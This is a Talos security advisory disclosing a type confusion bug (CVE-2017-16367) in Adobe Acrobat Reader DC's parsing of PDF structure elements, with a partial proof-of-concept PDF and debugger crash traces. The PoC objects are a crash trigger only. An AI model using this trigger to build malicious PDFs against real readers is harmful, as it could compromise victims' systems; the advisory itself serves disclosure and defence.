Talos Vulnerability Report

TALOS-2017-0356

Adobe Acrobat Reader DC PDF Structured Hierarchy ActualText Structure Element Remote Code Execution Vulnerability

November 14, 2017
CVE Number

CVE-2017-16367

Summary

An exploitable type confusion vulnerability exists in code responsible for parsing PDF documents with marked structure elements of Adobe Acrobat Reader DC 2017.009.20044. A specially crafted PDF file can trigger an out of bounds access on the heap potentially leading to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Tested Versions

Adobe Acrobat Reader DC 2017.009.20044

Product URLs

https://get.adobe.com/reader/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')

Details

Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.

Structured content elements are used in marked PDF documents to represent document structure which can be used when processing the document for future use. Some of these elements can influence the presentation of the content stream being rendered to the screen for accessibility, linguistic or other practical purposes.

There exists a vulnerability in a way Acrobat Reader handles malformed content streams that have marked structure content elements attached to them. Specifically, when processing a content stream which refers to a non existing font, structure element with ActualText attribute specifying a Unicode encoded soft hyphen can cause a buffer for a structure to be allocated which is then used in part of the code that expects a pointer to a different, bigger, structure leading first to out of bounds access and then further heap corruption.

Part of our proof of concept PDF file for this vulnerability is as follows:

6 0 obj
<<
  /Length 6975
>>
stream
q
BT
1 0 1 1 0 1 Tm
/NonexistantFont 400 Tf
/P <</MCID 0 >>BDC 
(E)Tj
EMC 
/TT1 400 Tf
/P <</MCID 1 >>BDC
(A)Tj
EMC
ET
endstream
endobj


7 0 obj
<<
  /Subtype /TrueType
  /BaseFont /Helvetica
  /Type /Font
>>
endobj


8 0 obj
[10 0 R 
 11 0 R ]
endobj




 10 0 obj
<<
  /ActualText <FEFF00AD>
  /S /Document
>>
endobj


 11 0 obj
<<
  /K 1
  /S /Document
  /Pg 4 0 R
>>
endobj

Above, in content stream in object 6, we see a Tf operator, which sends font and font size, referencing a non-existent font object. Then, we see two references to MCID numbered elements. These stand for Marked Content ID and refer to objects 10 and 11. When processing structured content, these structure elements are applied to the part of content stream they are part of. It should be pointed out that structure content element object 10 specifies ActualText key with unicode value of 0xfeff00ad (code for soft hyphen) which is to be used instead of the text rendered to the screen.

If we take a look with a debugger, we can see a memory area of size 0x18 being allocated:

Breakpoint 0 hit
eax=1f2b4fe8 ebx=1f26af18 ecx=00000018 edx=00000000 esi=0012e218 edi=0012e2ac
eip=6023d75d esp=0012e1c0 ebp=0012e1d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x39d3d:
6023d75d 59              pop     ecx
1:009> u eip-5
AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x39d38:
6023d758 e8b7e7e0ff      call    AcroRd32_60000000!AcroWinMainSandbox+0x39b0 (6004bf14)
6023d75d 59              pop     ecx
6023d75e 59              pop     ecx
6023d75f 894718          mov     dword ptr [edi+18h],eax
6023d762 ff7524          push    dword ptr [ebp+24h]
6023d765 ff06            inc     dword ptr [esi]
6023d767 ff7520          push    dword ptr [ebp+20h]
6023d76a ff751c          push    dword ptr [ebp+1Ch]
1:009> d eax
1f2b4fe8  00000000 00000000 00000000 00000000
1f2b4ff8  00000000 00000000 ???????? ????????
1f2b5008  ???????? ???????? ???????? ????????
1f2b5018  ???????? ???????? ???????? ????????
1f2b5028  ???????? ???????? ???????? ????????
1f2b5038  ???????? ???????? ???????? ????????
1f2b5048  ???????? ???????? ???????? ????????
1f2b5058  ???????? ???????? ???????? ????????
1:009> !heap -p -a eax 
    address 1f2b4fe8 found in
    _DPH_HEAP_ROOT @ 181000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                1f1722d8:         1f2b4fe8               18 -         1f2b4000             2000
    11248e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77f8628e ntdll!RtlDebugAllocateHeap+0x00000030
    77f4a6cb ntdll!RtlpAllocateHeap+0x000000c4
    77f15d20 ntdll!RtlAllocateHeap+0x0000023a
    03951c63 MSVCR120!_calloc_impl+0x00000045 [f:\dd\vctools\crt\crtw32\heap\calloc_impl.c @ 44]
    0395d5fb MSVCR120!calloc+0x00000018 [f:\dd\vctools\crt\crtw32\heap\calloc.c @ 48]
    6004bf26 AcroRd32_60000000!AcroWinMainSandbox+0x000039c2
    6023d75d AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00039d3d
    6023a7d7 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00036db7
    6023a20a AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x000367ea
    6023dbbf AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0003a19f
    6022faca AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002c0aa
    6022f4c7 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002baa7
    6022f2e6 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002b8c6
    6022b935 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00027f15
    600aa498 AcroRd32_60000000!DllCanUnloadNow+0x0001b2fa
    600a9dd2 AcroRd32_60000000!DllCanUnloadNow+0x0001ac34
    600a9bb6 AcroRd32_60000000!DllCanUnloadNow+0x0001aa18
    6004f94f AcroRd32_60000000!AcroWinMainSandbox+0x000073eb
    77d2c4e7 USER32!InternalCallWinProc+0x00000023
    77d2c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
    77d2cc19 USER32!DispatchMessageWorker+0x0000035e
    77d2cc70 USER32!DispatchMessageW+0x0000000f
    600a941f AcroRd32_60000000!DllCanUnloadNow+0x0001a281
    600a922b AcroRd32_60000000!DllCanUnloadNow+0x0001a08d
    60048e48 AcroRd32_60000000!AcroWinMainSandbox+0x000008e4
    6004872e AcroRd32_60000000!AcroWinMainSandbox+0x000001ca
    00407086 AcroRd32+0x00007086
    004ecca1 AcroRd32!AcroRd32IsBrokerProcess+0x0008b5a1
    77e2ee6c kernel32!BaseThreadInitThunk+0x0000000e
    77f23a03 ntdll!__RtlUserThreadStart+0x00000070
    77f239d6 ntdll!_RtlUserThreadStart+0x0000001b

In the above debugging output, we break after a call to AcroRd32_60000000!AcroWinMainSandbox+0x39b0 which is basically a wrapper around calloc. After this allocation, the returned chunk is examined with !heap -p -a eax where we can see its user size is 0x18 bytes. If we continue the execution we can observe the following crash:

(1274.1038): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1f2b4fe8 ebx=17476f90 ecx=0012e2ac edx=00000000 esi=0012e2ac edi=1f26af18
eip=6059fc4f esp=0012e1b0 ebp=0012e1b0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
AcroRd32_60000000!AX_PDXlateToHostEx+0x2032e2:
6059fc4f 8b4820          mov     ecx,dword ptr [eax+20h] ds:0023:1f2b5008=????????

Register eax holds a pointer to the previously allocated object, but the current instruction is trying to allocate a dword at offset 0x20 which is 8 bytes after the end of our buffer. This is clearly a read access violation that has crashed the process because of PageHeap, but if the out of bounds memory was readable, or another object was already there, the process could continue leading to further object misuse and further heap corruption which could be controlled to lead to arbitrary code execution.

If a correct font, instead of a non-existent one, was referenced in the content stream, execution takes a different route and a memory chunk of correct size (0x28 bytes) is allocated.

Crash Information

(2628.1574): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.dll - 
eax=1f944fe8 ebx=1e696f90 ecx=0012e2ac edx=00000000 esi=0012e2ac edi=1f8faf18
eip=6059fc4f esp=0012e1b0 ebp=0012e1b0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
AcroRd32_60000000!AX_PDXlateToHostEx+0x2032e2:
6059fc4f 8b4820          mov     ecx,dword ptr [eax+20h] ds:0023:1f945008=????????
1:009>1:009> !heap -p -a eax 
    address 1f944fe8 found in
    _DPH_HEAP_ROOT @ 19a1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                1f8125b0:         1f944fe8               18 -         1f944000             2000
    11248e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77f8628e ntdll!RtlDebugAllocateHeap+0x00000030
    77f4a6cb ntdll!RtlpAllocateHeap+0x000000c4
    77f15d20 ntdll!RtlAllocateHeap+0x0000023a
    04131c63 MSVCR120!_calloc_impl+0x00000045 [f:\dd\vctools\crt\crtw32\heap\calloc_impl.c @ 44]
    0413d5fb MSVCR120!calloc+0x00000018 [f:\dd\vctools\crt\crtw32\heap\calloc.c @ 48]
    6004bf26 AcroRd32_60000000!AcroWinMainSandbox+0x000039c2
    6023d75d AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00039d3d
    6023a7d7 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00036db7
    6023a20a AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x000367ea
    6023dbbf AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0003a19f
    6022faca AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002c0aa
    6022f4c7 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002baa7
    6022f2e6 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x0002b8c6
    6022b935 AcroRd32_60000000!CTJPEGDecoderReadNextTile+0x00027f15
    600aa498 AcroRd32_60000000!DllCanUnloadNow+0x0001b2fa
    600a9dd2 AcroRd32_60000000!DllCanUnloadNow+0x0001ac34
    600a9bb6 AcroRd32_60000000!DllCanUnloadNow+0x0001aa18
    6004f94f AcroRd32_60000000!AcroWinMainSandbox+0x000073eb
    77d2c4e7 USER32!InternalCallWinProc+0x00000023
    77d2c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
    77d2cc19 USER32!DispatchMessageWorker+0x0000035e
    77d2cc70 USER32!DispatchMessageW+0x0000000f
    600a941f AcroRd32_60000000!DllCanUnloadNow+0x0001a281
    600a922b AcroRd32_60000000!DllCanUnloadNow+0x0001a08d
    60048e48 AcroRd32_60000000!AcroWinMainSandbox+0x000008e4
    6004872e AcroRd32_60000000!AcroWinMainSandbox+0x000001ca
    00407086 AcroRd32+0x00007086
    004ecca1 AcroRd32!AcroRd32IsBrokerProcess+0x0008b5a1
    77e2ee6c kernel32!BaseThreadInitThunk+0x0000000e
    77f23a03 ntdll!__RtlUserThreadStart+0x00000070
    77f239d6 ntdll!_RtlUserThreadStart+0x0000001b

Timeline

2017-06-05 - Vendor Disclosure
2017-11-14 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.